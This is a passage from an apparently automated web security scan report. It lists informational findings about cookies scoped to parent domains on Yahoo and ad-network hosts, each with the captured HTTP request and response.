Set-Cookie: ysf=ofsOP8_H5xf895sWJTCd9NPX2WiBuAc7uOvkNKmiqCXeWEXt.5JJWgRWZ9jRCPYcB.3vOD1FfeTkx2jdWqUGZbqFFXzykG6SA7UxMAU82b.01IZHxh0tUWHBSA3n08efIw5qaM.ffg_vbq43qjMIBnKcfstPxGYOZcSggnL9TxHDcjJ99GtFQgcbtUEKHZ1fkIYxEusvCPp5bZI2.hOew2fKIIGI7w3CfeReG2Xu0Jmwi2fC.YchFzGWPWI_5nw6.BAzmBaXNJzz1bTr_DCy3SBGCT2DMn5D9G5JqZo4Bk6fX3Zs8Ojdpl3j7hTM5FYBdvx0VLNcFZIlOk3YrQseMxae8MRhopUnUtatVlbI4Cw5uUpj9CdikjKLeE..9R.KaGNmB9SQK_ZHdck_Ehxl_u7ZgNaW3APHvrcnb6Mx.gKKcB2XDQ2zCgx9JqmWKlWIWQC0YYBolBMwV8OqqN_iTuqnQw--; expires=Thu, 26-Apr-2012 13:56:11 GMT; path=/; domain=.yahoo.com; secure; httponly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 178981

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<META name="y_key" content="f760cc789e48a3df" />
<META name="google-site-verificati
...[SNIP]...

14.26. http://downloads.yahoo.com/windows  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://downloads.yahoo.com
Path:   /windows

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /windows HTTP/1.1
Host: downloads.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:55:05 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: ysf=e8hh476F5xfram8esL9uYMWUer4zVxwF9yCpDgtNY8OnYb8LD_SWa8_QLi9Zf_nIYdYzjXelUkLDzTd5b41mR1CxNhgLDeJHDzqdTA_eLB7_NzCP6Wp5J1nax6Fl7C53FlKTK3X2PDvsCY9f.C1X.bicPXpRyIP_cyXm9eGIvbxyykLRurMSQU0VWvd3X.Tvtb1_oT5ZxXajuPqdaGAOb.b4OXS02AtBEoLtP8RSAc2QL5O1mGGB9hINfdet0aGd3veAMcHbDG7KEhy9HwTlfx0IL8zE_mS3HW73sFhGOULomyXVqu3GnA4nTOqCY5E7M9MNb5RaoFPByjFgTjNrs8iFjmWFIq4uMdc5dBmcxooGV6f6fzOs87bsA3pt9yGcct.ODumZ3Gkqhu0IB.Pzes_Ys1kYrxNgn55_ms6pdomDxWcr08BuLVK.NLAlaPN3LdWDDu54bs9YvnuaK5ueLURN; expires=Thu, 26-Apr-2012 13:55:05 GMT; path=/; domain=.yahoo.com; secure; httponly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 154354

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<META name="y_key" content="f760cc789e48a3df" />
<META name="google-site-verificati
...[SNIP]...

14.27. http://downloads.yahoo.com/windows/desktop-enhancements/virtual-desktop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://downloads.yahoo.com
Path:   /windows/desktop-enhancements/virtual-desktop

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /windows/desktop-enhancements/virtual-desktop HTTP/1.1
Host: downloads.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.5.10.1303826118

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:56:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: ysf=gBH90to.5hf7Z2kPHVVBWT1SOsqA8znkBbhwDbdVtTDNQAnUJ2JU5sMkJoYkXjmm_JAUl0ncpuz70YW7mPjqrr5ij5IC87ycWrraNhzHrC2mTAo.wRnQRi_I2woD3u.f2KbfAH6kMJ3XcTVHbVH9MJO4JykNFL9_jvpCHC34w7ty0OXi4Pw6P1ZtfyiA2rqgVsOo9IS7gEGiiSUxMD5CsPVXKF0Er3.lwl5Vd.1HOfASbde9T7jw1q8ResrnweLIeYCAGyZx6o_IWDaZWAQu45KA.hCdcHthT46btDCeIczGSVK_3rdHcFP1SFrSHLiGSY8AfZyVZLpx3nwHu7IRdhT3coNoydg1kwsAK3uxvwmeQRPkbb4sA8_dGwNKGZvyckTkFHTUrXLQginUrM3tywEckcOI2Ou9oGcFNlOIGnh2m4yIZiLq3dDdRMkuNCmd_55TO55HJyjRYEm3ssZ2jLUS; expires=Thu, 26-Apr-2012 13:56:18 GMT; path=/; domain=.yahoo.com; secure; httponly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 305086

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<META name="y_key" content="f760cc789e48a3df" />
<META name="google-site-verificati
...[SNIP]...

14.28. http://downloads.yahoo.com/windows/is-it/security/anti-virus-scanners/avg-anti-virus-free-edition/42305  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://downloads.yahoo.com
Path:   /windows/is-it/security/anti-virus-scanners/avg-anti-virus-free-edition/42305

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /windows/is-it/security/anti-virus-scanners/avg-anti-virus-free-edition/42305 HTTP/1.1
Host: downloads.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.1.10.1303826118

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:56:08 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: ysf=xVd8BADE5xeANwBRYs5oLZOqg_4FZ6HdmpnP3mHJAK3o2rISGx9ISMjk9GKvcBYbrrAA2bDOHJ2MuK3IeVbHlBzoAS.smgIM3E6AVQQ5HGJIhLNu3IGyDfk5N.MvvnFmturIItI.TPOWyGkz9WnhF48GR79QpvqhRWFqwNP4lhdypwAsUqzy.epYzOkReKuzzAE6iVg75mlNK9L5yANHq2dI8uLRAr7WWG9Na.K__YtTRaZvZZ2r.B6gSTAygzYEueDTAy_34EUBdSTpnwgRDwM7EpBWx_BJL1B6_kPaZtES26xDZrRpq18313VM42HISJCsoKFnWDCcWGvIj9Z7EsIHQFaRktpA1DcyxuGrPZDo2jpM7MARGDfNaq17ifUVw9jfHnIhc3T2iPuHjTn6X0RP8GSV.fh1inGa5m24wd3NjtQJYVOxYZIMYnk.70uWmLX2Lg6jF3Q5XVVWfYwHDf7j; expires=Thu, 26-Apr-2012 13:56:08 GMT; path=/; domain=.yahoo.com; secure; httponly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 257732

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<META name="y_key" content="f760cc789e48a3df" />
<META name="google-site-verificati
...[SNIP]...

14.29. http://ds.addthis.com/red/psi/sites/www.comodo.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.comodo.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.comodo.com/p.json?callback=_ate.ad.hpr&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.comodo.com%2Fbusiness-security%2Fpci-compliance%2Fpci-scan.php&scb19p HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; psc=4; di=1303662902.60|1303662902.1OD|1303662902.1FE; dt=X; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 347
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 25 Apr 2011 23:45:33 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 25 May 2011 23:45:33 GMT; Path=/
Set-Cookie: di=%7B%7D..1303775133.1FE|1303775133.60; Domain=.addthis.com; Expires=Wed, 24-Apr-2013 15:01:13 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 25 Apr 2011 23:45:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 23:45:33 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2
...[SNIP]...

14.30. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ab?enc=pHA9CtcjE0CkcD0K1yMTQBLaci7FlQBApHA9CtcjE0CkcD0K1yMTQFUcOaKahDtdSsYda6b2ziXJ1LZNAAAAAEQwAAC1AAAAlgIAAAIAAADEpAIA0WMAAAEAAABVU0QAVVNEAHgAWAJhDE0AAg0BAgUCAAQAAAAAcx9FGwAAAAA.&tt_code=vert-314&udj=uf%28%27a%27%2C+9797%2C+1303827657%29%3Buf%28%27c%27%2C+52368%2C+1303827657%29%3Buf%28%27r%27%2C+173252%2C+1303827657%29%3Bppv%288991%2C+%276718109068834708565%27%2C+1303827657%2C+1303870857%2C+52368%2C+25553%29%3B&cnd=!uA56ZAiQmQMQxMkKGAAg0ccBKE0xMzMzEdcjE0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABY4RhgAGiWBQ..&referrer=http://www.spamlaws.com/spam-blocker.html&pp=TbbUyQAERXEK7FrIESl1USKqAlzx_1NgCAINaw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOnjTydS2TfGKEci1sQfR6qWJAdfq-NMBp5-U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MjUzODA5NDMwOTQwNDEwoAHD8v3sA7IBEHd3dy5zcGFtbGF3cy5jb226AQoxMjB4NjAwX2FzyAEJ2gEpaHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWyYAsobwAIEyAKF0s8KqAMB6AO6AugDigP1AwAAAMSABrqkhf7K9qWnTw%26num%3D1%26sig%3DAGiWqtyey6ImO1eOpu-MUOoG2tgmoZ9VPg%26client%3Dca-pub-5253809430940410%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; uuid2=2724386019227846218; anj=Kfu=8fG2<rgj[2<?0P(*AuB-u**g1:XIBUIEhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(BosBCiJ'm<TIMEqIboyNV)q=Qp[*@Cf#8I-v%(BIP1j2)__HclCm<*N6uMz?9EChIE6Heba3v9eO'3D=f6?$k1DsLHwO4.ddbEp]y:s8ZIDamDmL[vt]Y?BqbrQnoc@iD:G@#d1R07d]E9#M:?dTed^`/$a<!%MSD0+[NQkt?PxChdO7dL8Xcmrl6eV=s'xP'kk61c7qYk; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 14:21:03 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 14:21:03 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 14:21:03 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(Bo3KgX#`c5]qvg^lIg`K'/jYd`<2[cP$Mn.k).`o#?[DvFCmKS]_Rn]AnwyPLgc8R]HmkeLCt7wt+CdMJIY(Q8dnxZw!E9DDGh)[$QnR%ndJcRbu@?$Pk*eA85bgvgm.WQEeO/56q?$4$_+(]sS//QhH(L+o:.t`@]S2kvs7O@m7UZqq?WyPmfoNWxM!.CjYr2V.i; path=/; expires=Mon, 25-Jul-2011 14:21:03 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 26 Apr 2011 14:21:03 GMT
Content-Length: 1560

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bb9cfe77\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/PQrXo3A9DEA9CtejcD0MQBLa
...[SNIP]...

14.31. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=541&size=728x90&inv_code=1712152&referrer=http://www.nuclearpesticide.com/%3Fepl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x90%26section%3D1712152 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.nuclearpesticide.com/?epl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; uuid2=2724386019227846218; anj=Kfu=8fG2<rgj[2<?0P(*AuB-u**g1:XIBUIEhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(BosBCiJ'm<TIMEqIboyNV)q=Qp[*@Cf#8I-v%(BIP1j2)__HclCm<*N6uMz?9EChIE6Heba3v9eO'3D=f6?$k1DsLHwO4.ddbEp]y:s8ZIDamDmL[vt]Y?BqbrQnoc@iD:G@#d1R07d]E9#M:?dTed^`/$a<!%MSD0+[NQkt?PxChdO7dL8Xcmrl6eV=s'xP'kk61c7qYk; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 13:46:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 13:46:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 13:46:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII3I4BEAoYASABKAEwnJnb7QQQnJnb7QQYAA..; path=/; expires=Mon, 25-Jul-2011 13:46:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb539142=-@L6DkI/7Z(hw'8[[6$!k_chz?enc=amlp6fDwAEAAAADAzMz8PwAAAMDMzPw_Es64uq1-E0DZW8r5Yu8WQKsVYjFeUCUYSsYda6b2ziWczLZNAAAAAMVYAwAdAgAAlgIAAAIAAADIpAIAk8AAAAEAAABVU0QAVVNEANgCWgBWHwAABhABAgUCAAUAAAAA6yTaXwAAAAA.&tt_code=1712152&udj=uf%28%27a%27%2C+9797%2C+1303825584%29%3Buf%28%27c%27%2C+52368%2C+1303825584%29%3Buf%28%27r%27%2C+173256%2C+1303825584%29%3Bppv%288991%2C+%271739885196534224299%27%2C+1303825584%2C+1303868784%2C+52368%2C+49299%29%3B&cnd=!cBNCYQiQmQMQyMkKGAAgk4EDKAAxUUxr4mLvFkBCDggAELWn6QEYoQEgASgFQgwIn0YQuCEYAiADKAFCCwifRhAAGAAgAigBSANQAFjWPmAAaJYF; path=/; expires=Wed, 27-Apr-2011 13:46:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 13:46:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG2<rgj[2<?0P(*AuB-u**g1:XIBUIEhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(BosBCiJ'm<TIMEqIboyNV)q=Qp[*@Cf#8I-v%(BIP1j2)__HclCm<*N6uMz?9EChIE6Heba3v9eO'3D=f6?$k1DsLHwO4.ddbEp]y:s8ZIDamDmL[vt]Y?BqbrQnoc@iD:G@#d1R07d]E9#M:?dTed^`/$a<!%MSD0+[NQkt?PxChdO7dL8Xcmrl6eV=s'xP'kk61c7qYk; path=/; expires=Mon, 25-Jul-2011 13:46:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 26 Apr 2011 13:46:04 GMT
Content-Length: 167

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/st?anmember=541&anprice=170&ad_type=ad&ad_size=728x90&section=1712152"></scr'+'ipt>');

14.32. http://ib.adnxs.com/pxj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /pxj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1303072666-9018543%7cMUID%3db506c07761d7465d924574124e3c14df%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22); HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(Bo3KgX#`c5]qvg^lIg`K'/jYd`<2[cP$Mn.k).`o#?[DvFCmKS]_Rn]AnwyPLgc8R]HmkeLCt7wt+CdMJIY(Q8dnxZw!E9DDGh)[$QnR%ndJcRbu@?$Pk*eA85bgvgm.WQEeO/56q?$4$_+(]sS//QhH(L+o:.t`@]S2kvs7O@m7UZqq?WyPmfoNWxM!.CjYr2V.i

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 14:21:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 14:21:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 14:21:16 GMT; domain=.adnxs.com; HttpOnly
